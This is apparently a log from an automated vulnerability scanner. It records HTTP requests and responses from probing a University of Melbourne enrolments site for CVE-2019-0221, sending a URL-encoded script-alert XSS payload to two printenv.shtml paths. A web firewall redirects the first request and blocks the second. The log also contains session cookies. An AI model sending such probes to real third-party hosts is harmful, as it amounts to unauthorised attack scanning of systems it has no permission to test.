[CVE-2019-0221] Dumped HTTP request for https://enrolments.hildas.unimelb.edu.au/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E


GET /printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E HTTP/1.1
Host: enrolments.hildas.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2019-0221] Dumped HTTP response https://enrolments.hildas.unimelb.edu.au/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E

HTTP/1.1 302 Found
Connection: close
Content-Length: 122
Cache-Control: no-cache, no-store
Content-Type: text/html
Location: https://enrolments.hildas.unimelb.edu.au/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E
Set-Cookie: visid_incap_3211538=C9iMOzgyRXGq2PQu3u8OWAxyk2gAAAAAQUIPAAAAAADhk/fwGzn1gTW35anyW4PF; expires=Thu, 06 Aug 2026 07:06:45 GMT; HttpOnly; path=/; Domain=.hildas.unimelb.edu.au
Set-Cookie: incap_ses_237_3211538=zG22Hw1GNEWM6barov5JAwxyk2gAAAAA5d4GqCk0fzvRYSnV+zB+2g==; path=/; Domain=.hildas.unimelb.edu.au
X-Iinfo: 8-4189719-0 0NNN RT(1754493453269 34) q(0 -1 -1 -1) r(0 -1) B13(1,10037,0) U18


<HTML><HEAD><TITLE>Loading</TITLE></HEAD><BODY bgcolor="#ffffff"><H3 style="color: #ffffff">Loading</H3></BODY></HTML>

[CVE-2019-0221] Dumped HTTP request for https://enrolments.hildas.unimelb.edu.au/ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E


GET /ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E HTTP/1.1
Host: enrolments.hildas.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: visid_incap_3211538=C9iMOzgyRXGq2PQu3u8OWAxyk2gAAAAAQUIPAAAAAADhk/fwGzn1gTW35anyW4PF; incap_ses_237_3211538=zG22Hw1GNEWM6barov5JAwxyk2gAAAAA5d4GqCk0fzvRYSnV+zB+2g==
Accept-Encoding: gzip


[CVE-2019-0221] Dumped HTTP response https://enrolments.hildas.unimelb.edu.au/ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 936
Cache-Control: no-cache, no-store
Content-Type: text/html
X-Iinfo: 7-6738233-0 0NNN RT(1754493453315 8) q(0 -1 -1 0) r(1 -1) B15(1,502,52) U18

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script type="text/javascript" src="/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3"></script><script src="/Front-Night-supt-I-keepe-mans-his-rauing-it-of-N" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=7-6738233-0%200NNN%20RT%281754493453315%208%29%20q%280%20-1%20-1%200%29%20r%281%20-1%29%20B15%281%2c502%2c52%29%20U18&incident_id=237000430032710028-34375178790963911&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032710028-34375178790963911</iframe></body></html>
